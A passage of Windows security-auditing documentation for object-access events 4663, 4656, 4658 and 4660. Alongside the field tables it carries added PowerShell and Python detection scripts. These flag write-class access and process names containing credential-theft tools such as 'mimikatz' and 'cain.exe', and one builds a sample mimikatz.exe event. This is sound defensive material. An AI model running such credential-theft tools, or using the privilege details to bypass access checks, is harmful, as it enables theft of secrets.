AppendData (or AddSubdirectory or CreatePipeInstance)
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
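The following PowerShell is an added example and is not part of the Microsoft documentation. It applies the recommendations above to the local Security log: it reads 4663 events, decodes Access Mask with the bit values from the table above, and reports write-class access to a monitored object, or any access from a process that is not on an allow-list. The monitored path and the allow-list are assumptions; replace them with your own.

```powershell
# Added example, not from the Microsoft documentation. Reads 4663 events from the
# local Security log, decodes Access Mask with the bit values from the table above,
# and reports write-class access to a monitored file, or any access from a process
# that is not on an allow-list. Run elevated, or as a member of Event Log Readers.
$MonitoredPath    = 'C:\Documents\HBI Data.txt'           # assumption: the object to watch
$AllowedProcesses = @('C:\Windows\System32\notepad.exe')  # assumption: expected accessors

# Bit values of the file system access rights, with the names used in the table above.
# An array of pairs is used (not [ordered]) because an ordered dictionary indexed with an
# integer returns the entry at that position rather than the entry with that key.
$AccessBits = @(
    @{ Bit = 0x1;       Name = 'ReadData (or ListDirectory)' }
    @{ Bit = 0x2;       Name = 'WriteData (or AddFile)' }
    @{ Bit = 0x4;       Name = 'AppendData (or AddSubdirectory or CreatePipeInstance)' }
    @{ Bit = 0x8;       Name = 'ReadEA' }
    @{ Bit = 0x10;      Name = 'WriteEA' }
    @{ Bit = 0x20;      Name = 'Execute/Traverse' }
    @{ Bit = 0x40;      Name = 'DeleteChild' }
    @{ Bit = 0x80;      Name = 'ReadAttributes' }
    @{ Bit = 0x100;     Name = 'WriteAttributes' }
    @{ Bit = 0x10000;   Name = 'DELETE' }
    @{ Bit = 0x20000;   Name = 'READ_CONTROL' }
    @{ Bit = 0x40000;   Name = 'WRITE_DAC' }
    @{ Bit = 0x80000;   Name = 'WRITE_OWNER' }
    @{ Bit = 0x100000;  Name = 'SYNCHRONIZE' }
    @{ Bit = 0x1000000; Name = 'ACCESS_SYS_SEC' }
)
# The rights the recommendations above single out for file system objects: WriteData,
# AppendData, WriteEA, DeleteChild, WriteAttributes, DELETE, WRITE_DAC, WRITE_OWNER.
$WriteClassMask = 0x2 -bor 0x4 -bor 0x10 -bor 0x40 -bor 0x100 -bor 0x10000 -bor 0x40000 -bor 0x80000

function ConvertFrom-AccessMask {
    param([long]$Mask)
    # Returns the name of every right whose bit is set in the mask.
    foreach ($a in $AccessBits) {
        if (($Mask -band $a.Bit) -ne 0) { $a.Name }
    }
}

function Get-EventDataTable {
    param($Record)
    # Turns the <EventData><Data Name="..."> elements of the event XML into a hashtable.
    $table = @{}
    $xml = [xml]$Record.ToXml()
    foreach ($d in $xml.Event.EventData.Data) { $table[$d.GetAttribute('Name')] = $d.InnerText }
    return $table
}

$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4663 } -MaxEvents 5000 -ErrorAction SilentlyContinue
foreach ($e in $events) {
    $data = Get-EventDataTable $e
    if ($data['ObjectName'] -ne $MonitoredPath) { continue }

    # AccessMask is logged as a hex string such as 0x6; Convert accepts the 0x prefix for base 16.
    $mask       = [Convert]::ToInt64($data['AccessMask'], 16)
    $isWrite    = ($mask -band $WriteClassMask) -ne 0
    $unexpected = $AllowedProcesses -notcontains $data['ProcessName']
    if (-not ($isWrite -or $unexpected)) { continue }

    $reason = @()
    if ($isWrite)    { $reason += 'write-class access' }
    if ($unexpected) { $reason += 'process not on allow-list' }
    [pscustomobject]@{
        Time     = $e.TimeCreated
        Subject  = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
        LogonId  = $data['SubjectLogonId']   # joins to 4624 for the logon session
        HandleId = $data['HandleId']         # joins to the matching 4656 and 4658
        Process  = $data['ProcessName']
        Accesses = (ConvertFrom-AccessMask $mask) -join ', '
        Reason   = $reason -join '; '
    }
}
```

The Logon ID and Handle ID columns carry the correlations the field descriptions mention: the Logon ID joins to 4624 for the session, and the Handle ID together with the Process ID joins to the 4656 that opened the handle and the 4658 that closed it. Because 4663 has no Failure events, a denied write does not appear here at all; it is only visible as a Failure 4656.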
4656(S, F): A handle to an object was requested.
4/5/2019 • 16 minutes to read

Applies to
Windows 10
Windows Server 2016

Subcategories: Audit File System, Audit Kernel Object, Audit Registry, and Audit Removable Storage
Event Description:
This event indicates that specific access was requested for an object. The object could be a file system, kernel,
or registry object, or a file system object on removable storage or a device.
If access was declined, a Failure event is generated.
This event generates only if the object’s SACL has the required ACE to handle the use of specific access
rights.
This event shows that access was requested, and the results of the request, but it doesn’t show that the
operation was performed. To see that the operation was performed, check “4663(S): An attempt was made to
access an object.”

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4656</EventID>
    <Version>1</Version>
    <Level>0</Level>
    <Task>12800</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8010000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-18T22:15:19.346776600Z" />
    <EventRecordID>274057</EventRecordID>
    <Correlation />
    <Execution ProcessID="516" ThreadID="524" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x4367b</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="ObjectType">File</Data>
    <Data Name="ObjectName">C:\Documents\HBI Data.txt</Data>
    <Data Name="HandleId">0x0</Data>
    <Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data>
    <Data Name="AccessList">%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424</Data>
    <Data Name="AccessReason">%%1538: %%1804 %%1541: %%1809 %%4416: %%1809 %%4417: %%1809 %%4418: %%1802 D:(D;;LC;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4419: %%1809 %%4420: %%1809 %%4423: %%1811 D:(A;OICI;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4424: %%1809</Data>
    <Data Name="AccessMask">0x12019f</Data>
    <Data Name="PrivilegeList">-</Data>
    <Data Name="RestrictedSidCount">0</Data>
    <Data Name="ProcessId">0x1074</Data>
    <Data Name="ProcessName">C:\Windows\System32\notepad.exe</Data>
    <Data Name="ResourceAttributes">S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions:
0 - Windows Server 2008, Windows Vista.
1 - Windows Server 2012, Windows 8.
Added “Resource Attributes” field.
Added “Access Reasons” field.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested a handle to an object. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see
the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory
domain controller, and stored in a security database. Each time a user logs on, the system retrieves the
SID for that user from the database and places it in the access token for that user. The system uses the
SID in the access token to identify the user in all subsequent interactions with Windows security. When a
SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify
another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested a handle to an
object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS
LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this
account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent
events that might contain the same Logon ID, for example, “4624: An account was successfully logged
on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation.
The most common Object Types are:
DIRECTORY, EVENT, TIMER, DEVICE, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port

Object Name [Type = UnicodeString]: name and other identifying information for the object for
which access was requested. For example, for a file, the path would be included.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you
correlate this event with other events that might contain the same Handle ID, for example, “4663(S):
An attempt was made to access an object.” This parameter might not be captured in the event, and in
that case appears as “0x0”.
Resource Attributes [Type = UnicodeString] [Version 1]: attributes associated with the object. For
some objects, the field does not apply and “-“ is displayed.
For example, for a file, the following might be displayed: S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))
Impact_MS: Resource Property ID.
3000: Resource Property Value.

Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the access was
requested. Process ID (PID) is a number used by the operating system to uniquely identify an active
process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID
column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new
process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Access Request Information:
Transaction ID [Type = GUID]: unique GUID of the transaction. This field can help you correlate this
event with other events that might contain the same Transaction ID, such as “4660(S): An object was
deleted.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-
0000-0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to
identify resources, activities or instances.

Accesses [Type = UnicodeString]: the list of access rights which were requested by Subject\Security ID.
These access rights depend on Object Type. The following table contains information about the most
common access rights for file system objects. Access rights for registry objects are often similar to file
system objects, but the table contains a few notes about how they vary.

Format of each entry: Access name, then "Hexadecimal value, schema value", then the description.

ReadData (or ListDirectory)
  Hexadecimal value, schema value: 0x1, %%4416
  (For registry objects, this is “Query key value.”)
  ReadData - For a file object, the right to read the corresponding file data. For a directory object, the right to read the corresponding directory data.
  ListDirectory - For a directory, the right to list the contents of the directory.

WriteData (or AddFile)
  Hexadecimal value, schema value: 0x2, %%4417
  (For registry objects, this is “Set key value.”)
  WriteData - For a file object, the right to write data to the file. For a directory object, the right to create a file in the directory (FILE_ADD_FILE).
  AddFile - For a directory, the right to create a file in the directory.

AppendData (or AddSubdirectory or CreatePipeInstance)
  Hexadecimal value, schema value: 0x4, %%4418
  AppendData - For a file object, the right to append data to the file. (For local files, write operations will not overwrite existing data if this flag is specified without FILE_WRITE_DATA.) For a directory object, the right to create a subdirectory (FILE_ADD_SUBDIRECTORY).
  AddSubdirectory - For a directory, the right to create a subdirectory.
  CreatePipeInstance - For a named pipe, the right to create a pipe.

ReadEA
  Hexadecimal value, schema value: 0x8, %%4419
  (For registry objects, this is “Enumerate sub-keys.”)
  The right to read extended file attributes.

WriteEA
  Hexadecimal value, schema value: 0x10, %%4420
  The right to write extended file attributes.

Execute/Traverse
  Hexadecimal value, schema value: 0x20, %%4421
  Execute - For a native code file, the right to execute the file. This access right given to scripts may cause the script to be executable, depending on the script interpreter.
  Traverse - For a directory, the right to traverse the directory. By default, users are assigned the BYPASS_TRAVERSE_CHECKING privilege, which ignores the FILE_TRAVERSE access right. See the remarks in File Security and Access Rights for more information.

DeleteChild
  Hexadecimal value, schema value: 0x40, %%4422
  For a directory, the right to delete a directory and all the files it contains, including read-only files.

ReadAttributes
  Hexadecimal value, schema value: 0x80, %%4423
  The right to read file attributes.

WriteAttributes
  Hexadecimal value, schema value: 0x100, %%4424
  The right to write file attributes.

DELETE
  Hexadecimal value, schema value: 0x10000, %%1537
  The right to delete the object.

READ_CONTROL
  Hexadecimal value, schema value: 0x20000, %%1538
  The right to read the information in the object's security descriptor, not including the information in the system access control list (SACL).

WRITE_DAC
  Hexadecimal value, schema value: 0x40000, %%1539
  The right to modify the discretionary access control list (DACL) in the object's security descriptor.

WRITE_OWNER
  Hexadecimal value, schema value: 0x80000, %%1540
  The right to change the owner in the object's security descriptor.

SYNCHRONIZE
  Hexadecimal value, schema value: 0x100000, %%1541
  The right to use the object for synchronization. This enables a thread to wait until the object is in the signaled state. Some object types do not support this access right.

ACCESS_SYS_SEC
  Hexadecimal value, schema value: 0x1000000, %%1542
  The ACCESS_SYS_SEC access right controls the ability to get or set the SACL in an object's security descriptor.

Table 14. File System objects access rights.

Access Reasons [Type = UnicodeString] [Version 1]: the list of access check results. The format of this
varies, depending on the object. For kernel objects, this field does not apply.
Access Mask [Type = HexInt32]: hexadecimal mask for the requested or performed operation. For
more information, see the preceding table.
Privileges Used for Access Check [Type = UnicodeString]: the list of user privileges which were used
during the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event,
and in that case appears as “-”. See full list of user privileges in the table below:

Format of each entry: Privilege name (User right group policy name): Description.

SeAssignPrimaryTokenPrivilege (Replace a process-level token): Required to assign the primary token of a process. With this privilege, the user can initiate a process to replace the default token associated with a started subprocess.

SeAuditPrivilege (Generate security audits): With this privilege, the user can add entries to the security log.

SeBackupPrivilege (Back up files and directories): Required to perform backup operations. With this privilege, the user can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system. This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file. Any access request other than read is still evaluated with the ACL. The following access rights are granted if this privilege is held: READ_CONTROL, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_READ, FILE_TRAVERSE.

SeChangeNotifyPrivilege (Bypass traverse checking): Required to receive notifications of changes to files or directories. This privilege also causes the system to skip all traversal access checks. With this privilege, the user can traverse directory trees even though the user may not have permissions on the traversed directory. This privilege does not allow the user to list the contents of a directory, only to traverse directories.

SeCreateGlobalPrivilege (Create global objects): Required to create named file mapping objects in the global namespace during Terminal Services sessions.

SeCreatePagefilePrivilege (Create a pagefile): With this privilege, the user can create and change the size of a pagefile.

SeCreatePermanentPrivilege (Create permanent shared objects): Required to create a permanent object. This privilege is useful to kernel-mode components that extend the object namespace. Components that are running in kernel mode already have this privilege inherently; it is not necessary to assign them the privilege.

SeCreateSymbolicLinkPrivilege (Create symbolic links): Required to create a symbolic link.

SeCreateTokenPrivilege (Create a token object): Allows a process to create a token which it can then use to get access to any local resources when the process uses NtCreateToken() or other token-creation APIs. When a process requires this privilege, we recommend using the LocalSystem account (which already includes the privilege), rather than creating a separate user account and assigning this privilege to it.

SeDebugPrivilege (Debug programs): Required to debug and adjust the memory of a process owned by another account. With this privilege, the user can attach a debugger to any process or to the kernel. Developers who are debugging their own applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides complete access to sensitive and critical operating system components.

SeEnableDelegationPrivilege (Enable computer and user accounts to be trusted for delegation): Required to mark user and computer accounts as trusted for delegation. With this privilege, the user can set the Trusted for Delegation setting on a user or computer object. The user or object that is granted this privilege must have write access to the account control flags on the user or computer object. A server process running on a computer (or under a user context) that is trusted for delegation can access resources on another computer using the delegated credentials of a client, as long as the account of the client does not have the Account cannot be delegated account control flag set.

SeImpersonatePrivilege (Impersonate a client after authentication): With this privilege, the user can impersonate other accounts.

SeIncreaseBasePriorityPrivilege (Increase scheduling priority): Required to increase the base priority of a process. With this privilege, the user can use a process with Write property access to another process to increase the execution priority assigned to the other process. A user with this privilege can change the scheduling priority of a process through the Task Manager user interface.

SeIncreaseQuotaPrivilege (Adjust memory quotas for a process): Required to increase the quota assigned to a process. With this privilege, the user can change the maximum memory that can be consumed by a process.

SeIncreaseWorkingSetPrivilege (Increase a process working set): Required to allocate more memory for applications that run in the context of users.

SeLoadDriverPrivilege (Load and unload device drivers): Required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers.

SeLockMemoryPrivilege (Lock pages in memory): Required to lock physical pages in memory. With this privilege, the user can use a process to keep data in physical memory, which prevents the system from paging the data to virtual memory on disk. Exercising this privilege could significantly affect system performance by decreasing the amount of available random access memory (RAM).

SeMachineAccountPrivilege (Add workstations to domain): With this privilege, the user can create a computer account. This privilege is valid only on domain controllers.

SeManageVolumePrivilege (Perform volume maintenance tasks): Required to run maintenance tasks on a volume, such as remote defragmentation.

SeProfileSingleProcessPrivilege (Profile single process): Required to gather profiling information for a single process. With this privilege, the user can use performance monitoring tools to monitor the performance of non-system processes.

SeRelabelPrivilege (Modify an object label): Required to modify the mandatory integrity level of an object.

SeRemoteShutdownPrivilege (Force shutdown from a remote system): Required to shut down a system using a network request.

SeRestorePrivilege (Restore files and directories): Required to perform restore operations. This privilege causes the system to grant all write access control to any file, regardless of the ACL specified for the file. Any access request other than write is still evaluated with the ACL. Additionally, this privilege enables you to set any valid user or group SID as the owner of a file. The following access rights are granted if this privilege is held: WRITE_DAC, WRITE_OWNER, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_WRITE, FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY, DELETE. With this privilege, the user can bypass file, directory, registry, and other persistent object permissions when restoring backed up files and directories, and it determines which users can set any valid security principal as the owner of an object.

SeSecurityPrivilege (Manage auditing and security log): Required to perform a number of security-related functions, such as controlling and viewing audit events in the security event log. With this privilege, the user can specify object access auditing options for individual resources, such as files, Active Directory objects, and registry keys. A user with this privilege can also view and clear the security log.

SeShutdownPrivilege (Shut down the system): Required to shut down a local system.

SeSyncAgentPrivilege (Synchronize directory service data): This privilege enables the holder to read all objects and properties in the directory, regardless of the protection on the objects and properties. By default, it is assigned to the Administrator and LocalSystem accounts on domain controllers. With this privilege, the user can synchronize all directory service data. This is also known as Active Directory synchronization.

SeSystemEnvironmentPrivilege (Modify firmware environment values): Required to modify the nonvolatile RAM of systems that use this type of memory to store configuration information.

SeSystemProfilePrivilege (Profile system performance): Required to gather profiling information for the entire system. With this privilege, the user can use performance monitoring tools to monitor the performance of system processes.

SeSystemtimePrivilege (Change the system time): Required to modify the system time. With this privilege, the user can change the time and date on the internal clock of the computer. Users that are assigned this user right can affect the appearance of event logs. If the system time is changed, events that are logged will reflect this new time, not the actual time that the events occurred.

SeTakeOwnershipPrivilege (Take ownership of files or other objects): Required to take ownership of an object without being granted discretionary access. This privilege allows the owner value to be set only to those values that the holder may legitimately assign as the owner of an object. With this privilege, the user can take ownership of any securable object in the system, including Active Directory objects, files and folders, printers, registry keys, processes, and threads.

SeTcbPrivilege (Act as part of the operating system): This privilege identifies its holder as part of the trusted computer base. This user right allows a process to impersonate any user without authentication. The process can therefore gain access to the same local resources as that user.

SeTimeZonePrivilege (Change the time zone): Required to adjust the time zone associated with the computer's internal clock.

SeTrustedCredManAccessPrivilege (Access Credential Manager as a trusted caller): Required to access Credential Manager as a trusted caller.

SeUndockPrivilege (Remove computer from docking station): Required to undock a laptop. With this privilege, the user can undock a portable computer from its docking station without logging on.

SeUnsolicitedInputPrivilege (Not applicable): Required to read unsolicited input from a terminal device.

Restricted SID Count [Type = UInt32]: Number of restricted SIDs in the token. Applicable to only
specific Object Types.
Security Monitoring Recommendations
For 4656(S, F): A handle to an object was requested.
For kernel objects, this event and other auditing events have little to no security relevance and are hard to
parse or analyze. There is no recommendation for auditing them, unless you know exactly what you need to
monitor at the Kernel objects level.
For other types of objects, the following recommendations apply.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit
events.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events
with “Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32
or Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example,
“mimikatz” or “cain.exe”), check for these substrings in “Process Name.”
If Object Name is a sensitive or critical object for which you need to monitor any access attempt,
monitor all 4656 events.
If Object Name is a sensitive or critical object for which you need to monitor specific access attempts
(for example, only write actions), monitor for all 4656 events with the corresponding Access Request
Information\Accesses values.
If you need to monitor files and folders with specific Resource Attribute values, monitor for all 4656
events with specific Resource Attributes field values.
For file system objects, we recommend that you monitor these Access Request
Information\Accesses rights (especially for Failure events):
WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
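The checks in these recommendations, written out as detection logic. This is an added example, not code from the page: it parses a Security event in the XML form shown in this section, applies the three Process Name checks (expected name, standard or restricted folder, restricted substrings) and decodes the write-class Accesses from the event's AccessMask field using the standard Win32 access-right bit values, and it treats the Keywords value 0x8010000000000000 as the marker of a Failure audit (0x8020000000000000 is the Success value seen in the samples here). The folder lists, the object path and both sample events are constructed for the example; the same Process Name checks are repeated in the 4658, 4657 and 4670 recommendations later in this section, so the block applies to those as well.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Write-class file rights named in the 4656 recommendations, with the Win32
# access-mask bit each one occupies (FILE_WRITE_DATA, FILE_APPEND_DATA, ...).
WRITE_CLASS_RIGHTS = {
    "WriteData (or AddFile)": 0x0002,
    "AppendData (or AddSubdirectory or CreatePipeInstance)": 0x0004,
    "WriteEA": 0x0010,
    "DeleteChild": 0x0040,
    "WriteAttributes": 0x0100,
    "DELETE": 0x10000,
    "WRITE_DAC": 0x40000,
    "WRITE_OWNER": 0x80000,
}
AUDIT_FAILURE_KEYWORDS = 0x8010000000000000   # Keywords value carried by Failure audits
# Constructed folder policy for the example (lower-case, compared against the lower-cased path).
STANDARD_FOLDERS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")
RESTRICTED_FOLDERS = ("\\temporary internet files\\", "\\appdata\\local\\temp\\")
RESTRICTED_SUBSTRINGS = ("mimikatz", "cain.exe")       # the page's own examples


def parse_event(xml_text: str) -> Dict[str, str]:
    """Flatten one Security event: a few System fields plus every EventData/Data by Name."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    ev = {tag: system.findtext(f"e:{tag}", namespaces=NS) for tag in ("EventID", "Keywords", "Computer")}
    for data in root.find("e:EventData", NS).findall("e:Data", NS):
        ev[data.get("Name")] = data.text or ""
    return ev


def write_rights(access_mask: str) -> List[str]:
    """Names of the write-class rights present in a hexadecimal AccessMask."""
    mask = int(access_mask, 16)
    return [name for name, bit in WRITE_CLASS_RIGHTS.items() if mask & bit]


def check_process_name(process_name: str, expected: Optional[str] = None) -> List[str]:
    """The three Process Name checks the recommendations describe."""
    p = process_name.lower()
    findings = []
    if expected and p != expected.lower():
        findings.append(f"process is not the expected {expected}")
    if not p.startswith(STANDARD_FOLDERS):
        findings.append("process outside System32/Program Files")
    if any(folder in p for folder in RESTRICTED_FOLDERS):
        findings.append("process in a restricted folder")
    findings.extend(f"restricted substring '{s}' in process name" for s in RESTRICTED_SUBSTRINGS if s in p)
    return findings


def review_4656(xml_text: str, expected_process: Optional[str] = None) -> List[str]:
    """Apply the recommendations to one 4656 event; an empty list means nothing to flag."""
    ev = parse_event(xml_text)
    if ev["EventID"] != "4656":
        return []
    findings = check_process_name(ev.get("ProcessName", ""), expected_process)
    rights = write_rights(ev.get("AccessMask", "0x0"))
    if rights:
        failed = int(ev["Keywords"], 16) == AUDIT_FAILURE_KEYWORDS
        findings.append(("FAILED " if failed else "") + "write-class access requested: " + ", ".join(rights))
    return findings


# Constructed sample events (not from the page): a failed write-class request from a
# process in a temp folder, and a routine read-attributes request from System32.
def _event(event_id: str, keywords: str, process: str, access_mask: str) -> str:
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>{event_id}</EventID><Keywords>{keywords}</Keywords><Computer>DC01.contoso.local</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="ObjectType">File</Data>
    <Data Name="ObjectName">C:\\Documents\\payroll.xlsx</Data>
    <Data Name="AccessMask">{access_mask}</Data>
    <Data Name="ProcessName">{process}</Data>
  </EventData>
</Event>"""


SAMPLE_4656_FAILURE = _event("4656", "0x8010000000000000",
                             "C:\\Users\\dadmin\\AppData\\Local\\Temp\\mimikatz.exe", "0x10102")
SAMPLE_4656_SUCCESS = _event("4656", "0x8020000000000000", "C:\\Windows\\System32\\notepad.exe", "0x80")

if __name__ == "__main__":
    for name, sample in (("failure", SAMPLE_4656_FAILURE), ("success", SAMPLE_4656_SUCCESS)):
        print(name, review_4656(sample) or ["nothing to flag"])
```

Decoding the mask bits rather than the %%-coded Accesses list keeps the check independent of the message table Event Viewer uses to render those codes, and the Keywords test is what distinguishes the Failure events the recommendations single out.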
4658(S): The handle to an object was closed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit
Handle Manipulation, Audit Kernel Object,
Audit Registry, and Audit Removable Storage
Event Description:
This event generates when the handle to an
object is closed. The object could be a file
system, kernel, or registry object, or a file
system object on removable storage or a
device.
This event generates only if Success auditing
is enabled for Audit Handle Manipulation
subcategory.
Typically this event is needed if you need to
know how long the handle to the object was
open. Otherwise, it might not have any
security relevance.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4658</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12800</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-22T00:15:42.910428100Z" />
    <EventRecordID>276724</EventRecordID>
    <Correlation />
    <Execution ProcessID="4" ThreadID="5056" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x4367b</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="HandleId">0x18a8</Data>
    <Data Name="ProcessId">0xef0</Data>
    <Data Name="ProcessName">C:\Windows\explorer.exe</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “close object’s handle” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “close object’s
handle” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you
correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An
attempt was made to access an object.” This parameter might not be captured in the event, and in that case
appears as “0x0”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that requested that the handle be
closed. Process ID (PID) is a number used by the operating system to uniquely identify an active process.
To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.

Security Monitoring Recommendations
For 4658(S): The handle to an object was closed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit
events.

Typically this event has little to no security relevance and is hard to parse or analyze. There is no
recommendation for this event, unless you know exactly what you need to monitor with it.
This event can be used to track all actions or operations related to a specific object handle.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or
“cain.exe”), check for these substrings in “Process Name.”
4660(S): An object was deleted.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit
Kernel Object, and Audit Registry
Event Description:
This event generates when an object was
deleted. The object could be a file system,
kernel, or registry object.
This event generates only if “Delete” auditing is set in object’s SACL.
This event doesn’t contain the name of the deleted object (only the Handle ID). It is better to use “4663(S): An attempt was made to access an object” with DELETE access to track object deletion.
The advantage of this event is that it’s generated only during real delete operations. In contrast, “4663(S): An attempt was made to access an object” also generates during other actions, such as object renaming.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4660</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12800</Task>
    <Opcode>0</Opcode>
